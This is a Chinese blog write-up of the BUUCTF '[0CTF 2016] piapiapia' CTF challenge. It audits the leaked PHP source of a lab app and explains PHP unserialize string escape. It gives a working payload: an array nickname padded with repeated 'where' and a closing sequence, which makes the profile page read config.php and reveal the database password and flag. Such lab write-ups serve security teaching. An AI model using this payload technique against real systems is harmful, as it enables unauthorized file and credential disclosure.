BUUCTF [0CTF 2016] piapiapia

最新推荐文章于 2023-02-01 11:34:44 发布
最新推荐文章于 2023-02-01 11:34:44 发布
阅读量751 收藏 2
点赞数 1
分类专栏: BUUCTF WEB Writeup 文章标签: BUUCTF 0CTF 2016 piapiapia writeup CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/112183323
版权

BUUCTF [0CTF 2016] piapiapia

考点

  1. php代码审计
  2. 反序列化字符串逃逸

启动环境:
在这里插入图片描述
首先是个登录框,只有登陆功能,尝试了一波弱密码和万能密码:
在这里插入图片描述
猜测可能不是,继续对题目进行信息收集,使用ctf-wscan扫描网站目录:

python3 ctf-wscan.py http://xxx.cn/

得到扫描结果:
在这里插入图片描述
查看到其存在注册页面:
在这里插入图片描述
访问update.php页面:
在这里插入图片描述
需要先进行登陆。

以及其存在源码泄露,下载www.zip到本地:
在这里插入图片描述
对源码进行分析,其中static中存放的网页CSS、JS等内容,upload目录应该存放的是上传的文件,当前为空。

首先查看config.php

<?php
	$config['hostname'] = '127.0.0.1';
	$config['username'] = 'root';
	$config['password'] = '';
	$config['database'] = '';
	$flag = '';
?>

其中定义了username的值为root,以及存在变量$flag

class.php页面定义了各种方法。

register.php页面和index.php页面作为注册登陆,没发现什么明显利用点。

update.php页面中:

<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

		$username = $_SESSION['username'];
		if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');

		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');

		$file = $_FILES['photo'];
		if($file['size'] < 5 or $file['size'] > 1000000)
			die('Photo size error');

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);

		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
	}
	else {
?>
<!DOCTYPE html>
<html>
<head>
   <title>UPDATE</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
	<div class="container" style="margin-top:100px">  
		<form action="update.php" method="post" enctype="multipart/form-data" class="well" style="width:220px;margin:0px auto;"> 
			<img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
			<h3>Please Update Your Profile</h3>
			<label>Phone:</label>
			<input type="text" name="phone" style="height:30px"class="span3"/>
			<label>Email:</label>
			<input type="text" name="email" style="height:30px"class="span3"/>
			<label>Nickname:</label>
			<input type="text" name="nickname" style="height:30px" class="span3">
			<label for="file">Photo:</label>
			<input type="file" name="photo" style="height:30px"class="span3"/>
			<button type="submit" class="btn btn-primary">UPDATE</button>
		</form>
	</div>
</body>
</html>
<?php
	}
?>

首先通过SESSION验证登陆状态,然后根据正则表达式过滤传入的数据。
仔细观察,其中对nickname的验证与之前不同,此处通过strlen()验证了长度不能超过10
此处可以通过数组绕过限制。
在最后调用update_profile()时调用了serialize()函数,推测其可能存在反序列化漏洞,在class.php页面中查找update_profile()函数:

public function update_profile($username, $new_profile) {
		$username = parent::filter($username);
		$new_profile = parent::filter($new_profile);

		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where);
	}

其中filter()函数:

public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}

其中update()函数:

public function update($table, $key, $value, $where) {
		$sql = "UPDATE $table SET $key = '$value' WHERE $where";
		return mysql_query($sql);
	}

其基本逻辑为:

  • 正则表达式过滤提交的参数
  • 序列化变量$profile
  • 将非法值替换为hacker

profile.php页面中:

<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	$username = $_SESSION['username'];
	$profile=$user->show_profile($username);
	if($profile  == null) {
		header('Location: update.php');
	}
	else {
		$profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));
?>
<!DOCTYPE html>
<html>
<head>
   <title>Profile</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
	<div class="container" style="margin-top:100px">  
		<img src="data:image/gif;base64,<?php echo $photo; ?>" class="img-memeda " style="width:180px;margin:0px auto;">
		<h3>Hi <?php echo $nickname;?></h3>
		<label>Phone: <?php echo $phone;?></label>
		<label>Email: <?php echo $email;?></label>
	</div>
</body>
</html>
<?php
	}
?>

其中$photo = base64_encode(file_get_contents($profile['photo']));,其中变量$photo经过了file_get_contents()处理,若在此处将$profile['photo']替换为config,php,那么就可以读取到其中的flag。

经过查阅资料,此处为反序列化字符串逃逸
例如:
序列化:

<?php
	$a = array('123', 'abc', 'defg');
	var_dump(serialize($a));
?>

得到结果:

string(49) "a:3:{i:0;s:3:"123";i:1;s:3:"abc";i:2;s:4:"defg";}"

将结果反序列化:

<?php
	$b = 'a:3:{i:0;s:3:"123";i:1;s:3:"abc";i:2;s:4:"defg";}';
    var_dump(unserialize($b));
?>

得到结果:

array(3) {
  [0]=>
  string(3) "123"
  [1]=>
  string(3) "abc"
  [2]=>
  string(4) "defg"
}

反序列化是以";}结束的,因此需要把";}带入需要反序列化的字符串中,使反序列化提前结束而后面的内容就会被丢弃。

将第二个值的abc替换为:abc";i:2;s:5:"qwert";}后,再次执行反序列化,得到结果:

array(3) {
  [0]=>
  string(3) "123"
  [1]=>
  string(3) "abc"
  [2]=>
  string(5) "qwert"
}

将之前defg的值,替换为了qwert

在本题中,首先序列化字符串内容可控,所以此时构造包含config.php的数据,利用反序列化字符串逃逸,在profile.php页面中读出flag。

首先在register.php页面注册用户test:
在这里插入图片描述
成功登陆后,进入到update.php页面:
在这里插入图片描述
提交数据后,用BurpSuite抓取数据包:
在这里插入图片描述
在修改参数尝试反序列化字符串逃逸时,发现update.php页面将提交的参数序列化处理:

<?php
	$profile['phone'] = '13636363636';
	$profile['email'] = '123456789@qq.com';
	$profile['nickname'] = 'test1';
	$profile['photo'] = 'upload/f3ccdd27d2000e3f9255a7e3e2c48800';

	var_dump(serialize($profile));
?>

得到序列化后的结果:

string(159) "a:4:{s:5:"phone";s:11:"13636363636";s:5:"email";s:16:"123456789@qq.com";s:8:"nickname";s:5:"test1";s:5:"photo";s:39:"upload/f3ccdd27d2000e3f9255a7e3e2c48800";}"

nickname前面s的值无法更改,所以在最后构造一个闭合,使得photo的值被丢弃,也就是";}s:5:"photo";s:10:"config.php";}
若想拼接进反序列化字符串中,还需经过filter()函数过滤:

public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}

其中";}s:5:"photo";s:10:"config.php";}长度为34,所以需要额外34位,所以在写入where时,被替换为hacker,字符串长度+1

nickname修改为数组类型,并尝试构造payload:

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

在这里插入图片描述
发送数据包,在profile.php页面查看修改后的内容:
在这里插入图片描述
信息修改成功,图片未能加载,查看图片的源码链接:

<img src="data:image/gif;base64,PD9waHAKJGNvbmZpZ1snaG9zdG5hbWUnXSA9ICcxMjcuMC4wLjEnOwokY29uZmlnWyd1c2VybmFtZSddID0gJ3Jvb3QnOwokY29uZmlnWydwYXNzd29yZCddID0gJ3F3ZXJ0eXVpb3AnOwokY29uZmlnWydkYXRhYmFzZSddID0gJ2NoYWxsZW5nZXMnOwokZmxhZyA9ICdmbGFne2E2ZDk2NGMzLTg0MWEtNGYwNy05YmNhLTczZmJkNjhkZjQxZX0nOwo/Pgo=" class="img-memeda " style="width:180px;margin:0px auto;">

对其进行BASE64解码,得到flag:
在这里插入图片描述

Senimo_
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
主要介绍了0CTF-2016-piapiapia(php反序列化长度变化尾部字符串逃逸),本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
[0CTF 2016]piapiapia
weixin_45808483的博客
12-08 877
知识点: 信息泄露 PHP反序列化字符串逃逸(替换后导致字符串变长) 参数传递数组绕过字符串检测 题目链接 BUUCTF在线评测 1.启动环境,一个登录框 2.dirsearch扫描 先拿dirsearch扫描一遍,第一次什么也没有扫到,全部都是429。加上延时并且调一下线程再扫描一次,这一次我们扫到了压缩文件,但是普通的php文件扫不到~~。 <!--more--> 3.下载源码审计 打开config.php,我们发现了flag 继续分析源码,发现三
BUUCTF:[0CTF 2016]piapiapia
qq_46230755的博客
12-26 504
题目页面是一个登录页面。拿到题目第一步当然考虑一下有没有注入。当然经过几次测试答案是没有的。 利用工具扫一下是否存在其他的页面 果然扫到了一个www.zip 我们尝试一下进入注册的页面 注册一个admin 123456 进去里面看看,发现可以传东西,考虑是不是文件上传漏洞(事实证明没有) 随便传个东西,发现会跳转到另一个页面 回到一开始拿到的源码,发现config.php文件里存在flag,但是不可读 config(): <?php $config['hostname'] = '1.
[0CTF 2016]piapiapia(反序列化逃逸)
paidx0
09-02 692
偷了三天懒没有学习,哈哈哈,通宵看完了扫黑风暴 开始做题 打开环境,第一时间以为是SQL注入,用sqlmap跑了一下,并不是 找了一下也没有什么东西,就去扫一下他的敏感目录,扫到www.zip,下载下来 先用Seay快速审计一下,再去细看代码逻辑 知识点 1、代码审计 2、反序列化逃逸 来一起看看代码吧 先看看可能存在文件读取的profile.php 首先想到的就是利用反序列化,然后文件读取,继续跟进 $profile = $user->show_profile($username); 再看in
[0CTF 2016]piapiapia(字符逃逸详解)
记录学习,一起进步
02-01 799
[0CTF 2016]piapiapia
2016华山杯ctf安卓题目
06-17
2016年华山杯ctf安卓题目
CTF Writeups 2016.9.29
09-29
CTF Writeups 2016.9.29
0ctf_2016_warmup
05-17
20160ctf的pwn题。
拍片哥 php,从CTF中学习PHP反序列化的各种利用方式
weixin_34589862的博客
03-12 635
前言出于对php反序列漏洞感兴趣, 遂写一文总结一下在学习PHP反序列化的漏洞过程中遇到的点, 在CTF中有关的漏洞形式几乎是必出__wakeup()对应的CVE编号: CVE-2016-7124存在漏洞的PHP版本: PHP5.6.25之前版本和7.0.10之前的7.x版本漏洞概述: __wakeup()魔法函数被绕过,导致执行了一些非预期效果的漏洞漏洞原理: 当对象的属性(变量)数大于实际的个...
CTF 中的 PHP 漏洞利用总结
热门推荐
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
BUUCTF-WEB 【0CTF 2016piapiapia 1
qq_36410265的博客
12-27 1833
BUUCTF-WEB 【0CTF 2016piapiapia 1
[0CTF 2016]piapiapia 详细解题思路及做法
EC_Carrot的博客
12-09 1214
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 进去是一个登陆界面,尝试sql注入,发现没什么用,但又没有其他功能了,只能扫描看看有没有源码泄露 这边用的是dirsearch,可以扫描出www.zip文件,但在BUUCTF里面做题需要设置延迟参数-x,不然扫描太快就全是返回429状态码。 在www.zip提供的源码里面主要有: index.php、profile.php、register.p
BUU-0CTFpiapiapia(反序列化字符串逃逸)
unexpectedthing的博客
11-14 2873
前言 考点是反序列化字符串逃逸 wp 首先这个题,一进来就是一个登录平台,就属于一种基本的web网站的搭建,先登录再去后台,一般来说,可以sql注入之类的,但是我们习惯先看F12的源码,然后用御剑和dirsearch工具去扫描后台或者文件的泄露。 发现存在备份文件泄露,www.zip,得到源码 开始代码审计 config.php中发现了flag变量,看来题目目的是让我们读取config.php了。 我们来看下每个页面: index.php <?php require_once('class.php'
BUUCTF--[0CTF 2016]piapiapia
qq_43054896的博客
05-01 1074
一、[0CTF 2016]piapiapia 1、dirsearch扫出了了www.zip压缩包 2、审计代码,在config.php中有变量flag,但为空,flag应该在服务器的config.php文件中,要找漏洞读取服务器的flag 3、审计代码,有注册功能,且代码中要求必须注册才能进行其后的操作;update.php中对用户填写的信息进行了一些限制,且将信息序列化保存,除此之外clas...
ctf从0到1电子书
最新发布
12-14
CTF从0到1》是一本针对CTF(Capture The Flag)竞赛的电子书,旨在帮助初学者快速入门和提高他们的技能。该书包括了CTF竞赛的基础知识、技巧和策略,并提供了详细的实例和实战练习,帮助读者从零开始逐步建立起...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值